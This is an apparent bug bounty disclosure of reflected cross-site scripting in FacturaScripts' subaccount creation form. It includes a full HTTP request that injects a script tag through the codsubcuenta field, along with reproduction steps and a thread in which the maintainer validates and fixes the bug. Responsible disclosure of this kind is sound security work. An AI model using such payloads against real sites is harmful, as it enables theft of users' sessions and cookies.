Cross-site scripting - Reflected in Create Subaccount in neorazorx/facturascripts

Valid

Reported on

Apr 30th 2022


Description

Cross-site scripting - Reflected in Create Subaccount via codsubcuenta parameter.

Proof of Concept

POST /facturascripts/EditSubcuenta HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------363416527826407339693188325960
Content-Length: 1558
Origin: http://localhost
Connection: close
Referer: http://localhost/facturascripts/EditSubcuenta
Cookie: fsNick=admin; fsLogkey=6pCG4IKxZ8oOUTkeVg5siaMfyR2q37Bb9JhYvAPlXH1rLWdcmFSNun0wjzQtED; fsLang=en_EN; fsCompany=1; lhc_vid=0155fb94b7b38957dfc4; lhc_rm_u=GW6CXYX9Kvs3laO9i4fjnR7ruXW44H%3A1%3A87494d3c0efceb6d8d9974ea5e6c9f11881b9ee0; organizrLanguage=en; csrf-token-data=%7B%22value%22%3A%22jzfiNNFxYEXZET6aCcebWmglZOg2JPA9SsDylMUM%22%2C%22expiry%22%3A1651160325308%7D; lang=en_US; 
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="action"

insert
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="activetab"

EditSubcuenta
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="code"


-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="multireqtoken"

99a8c7a2305b11e06fbd8bc0c9446f0826e73bdd|5yqptN
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="codsubcuenta"

<script>alert(1337)</script>
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="descripcion"

123123
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="codejercicio"

2022
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="idcuenta"


-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="codcuentaesp"

CLIENT
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="debe"

0
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="haber"

0
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="saldo"

0
-----------------------------363416527826407339693188325960--

Step to reproduce

  1. In Accounting section, choose New and fill all form with anything value

image

  1. Use Burp suite intercept this request and modify codsubcuenta parameter value with XSS payload and click Forward

image

  1. And alert(1337) execute

image

Impact

This vulnerability can be arbitrarily executed javascript code to steal user'cookie, perform HTTP request, get content of same origin page, etc ...

We are processing your report and will contact the neorazorx/facturascripts team within 24 hours. a month ago
We have contacted a member of the neorazorx/facturascripts team and are waiting to hear back a month ago
Nhien.IT
a month ago

Researcher


Hi @admin,

Can you help me contact the maintainer?

Jamie Slome
a month ago

Admin


@nhienit2010 - our system will reach out to the maintainer automatically and notify them of your report. The maintainer is extremely active on the platform, so I am sure you will hear back shortly ♥️

Nhien.IT
a month ago

Researcher


Thank you a lots <3

Carlos Garcia validated this vulnerability 25 days ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Carlos Garcia confirmed that a fix has been merged on 482c5a 25 days ago
Carlos Garcia has been awarded the fix bounty
Nhien.IT
24 days ago

Researcher


Hi @maintainer, the fix is already released, can you assign a CVE here? if you can, hope @admin help

Jamie Slome
24 days ago

Admin


Sorted 👍

to join this conversation